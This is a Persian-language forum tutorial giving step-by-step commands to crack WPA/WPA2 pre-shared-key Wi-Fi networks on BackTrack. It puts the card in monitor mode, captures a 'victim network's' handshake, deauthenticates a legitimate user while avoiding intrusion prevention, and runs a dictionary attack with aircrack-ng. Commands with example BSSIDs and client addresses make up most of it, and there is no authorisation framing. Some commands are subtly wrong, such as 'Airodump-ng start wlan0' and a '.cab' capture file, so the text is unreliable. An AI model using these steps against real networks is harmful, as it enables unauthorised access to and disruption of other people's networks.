در مقاله آموزشی گذشته hack wep آن را آموزش دادم. اما الگوریتم های WPA و WPA2 دارای امنیت بیشتری نسبت WEP هستند چون امنیت آن علاوه بر الگریتم قوی آن بستگی به پیچیدگی رمز شبکه و نوع حمله(پردازش قدرتی یا حمله دیکشنری) دارد.
در این مقاله به صورت قدم به قدم هک شبکه های رمزنگاری WPA و WPA2 که با رمز از پیش مشترک(Pre-Shared Keys) را توسط بک ترک آموزش میدهم(کلید از پیش مشترک کلیدیست که از پیش توسط یک کانال امن بین دو طرف به اشتراک گذاشته می شود.). در این حمله از روش دیکشنری استفاده میکنیم.
مراحلی که در این هک طی میکنیم:
۱ . رابط شبکه بیسیم خود را در حالت مانیتور قرار می دهیم. در این مرحله باید بتوانید اکسس پوینت مورد نظر خود را مشاهده کنید. ۲ . با استفاده از airodump-ng اطلاعات هندشیک تایید هویت اکسس پوینت را ثبت میکنیم. ۳ . از aireplay-ng برای خارج کردن کاربر از شبکه استفاده می کنیم تا بتوانیم با اکسس پوینت ارتباط برقرار کنیم. ۴ . از aircrack-ng برای کرک کردن کلید از پیش مشترک به وسیله فایل دیکشنری استفاده می کنیم. آموزش قدم به قدم: ۱ . خط فرمان بک ترک(Konsole) را برای شروع کار باز کنید. کنسول در نوار وظیفه بک ترک در پایین سمت چپ قرار دارد.
فرمان زیر را اجرا کنید:
[php][align=LEFT]airmon-ng[/align][/php]
این فرمان لیست کارت های شبکه را نشان میدهد. این فرمان برچسب کارت شبکه شما(نام آن در لینوکس) را در ستون interface نشان میدهد. این برچسب ممکن است به صورت wlan0، ath0، wifi0، یا ra0 و … نمایش داده شود. ما از برچسب wlan0 در فرمان های بعدی استفاده میکنیم. شما به جای آن از برچسبی که در خط فرمان خود مشاهده میکنید استفاده کنید.
حالا در فرمان زیر کارت شبکه را در حالت مانیتور قرار میدهیم. فراموش نکنید به جای wlan0 برچسب کارت شبکه خود را که در دستور قبل به دست آوردیم را وارد کنید.
کد:
[align=LEFT]Airodump-ng start wlan0[/align]
2 . در این مرحله شبکه قربانی را مشخص میکنیم. برای بدست آوردن شبکه های اطراف رابط خود را در حالت مانیتور قرار میدهیم و برچسب mon0 را به آن اختصاص میدهیم:
کد:
[align=LEFT]Airodump-ng mon0[/align]
حالا که شبکه مورد نظر خود را انتخاب کردید مقادیر لیست شده در مقابل آن را یادداشت کنید یا آن را در یک ویرایشگر متن کپی کنید. ما در مراحل بعد به بیشتر این مقادیر نیاز خواهیم داشت. حالا دستور بعد را با مقادیر بدست آمده اجرا می کنیم:
کد:
[align=LEFT]airodump-ng mon0 --channel 11 --bssid 68:7F:74:06:69:C7 -w linksysfile.cab[/align]
[align=CENTER][/align] ۳٫ ما میتوانیم برای ذخیره اطلاعات تایید هویت یک کاربر قانونی منتظر شویم تا او به شبکه وصل شود.
در صورتی که نسبت به عدم وجود سیستم های جلوگیری از نفوذ در شبکه قربانی اطمینان دارید یکی از کاربران را از شبکه خارج میکنیم تا آن را مجبور به اتصال دوباره او به شبکه کنیم. برای این کار فرمان را به شکل زیر وارد می کنیم:
کد:
[align=LEFT]aireplay-ng -0 1 -a (bssid) -c (client) (monitor)[/align]
کد:
[align=LEFT]aireplay-ng -0 1 -a 68:7F:74:06:69:C7 -c 00:C0:CA:25:AC:68 mon0[/align]
[align=CENTER][/align]
۴ . در این مرحله از فایل حاوی پکت هایی که از شبکه شنود کردیم برای شکستن رمزنگاری شبکه استفاده میکنیم. این که رمز شبکه قابل شکستن است یا نه یا اینکه چه مدت زمان برای شکستن رمز شبکه لازم است بستگی به پیچیدگی رمز شبکه و بهینه بودن فایل دیکشنری شما دارد. ما در اینجا از یکی از فایل های دیکشنری که همراه aircrack-ng در بکترک تعبیه شده استفاده میکنیم. این فایل در مسیر /pentest/wireless/aircrack-ng/test واقع شده. شما میتوانید فایل های دیگری را نیز از اینترنت دانلود کنید.
ساختار فرمانی برای شکستن قفل شبکه از آن استفاده میشود به این شکل است:
کد:
[align=LEFT]aircrack-ng -w (passwordsfile) -b (bssid) (filename-01.cap)[/align]
کد:
[align=LEFT]aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 68:7F:74:06:69:C7 linksysfile.cab[/align]
[align=CENTER][/align]
نظر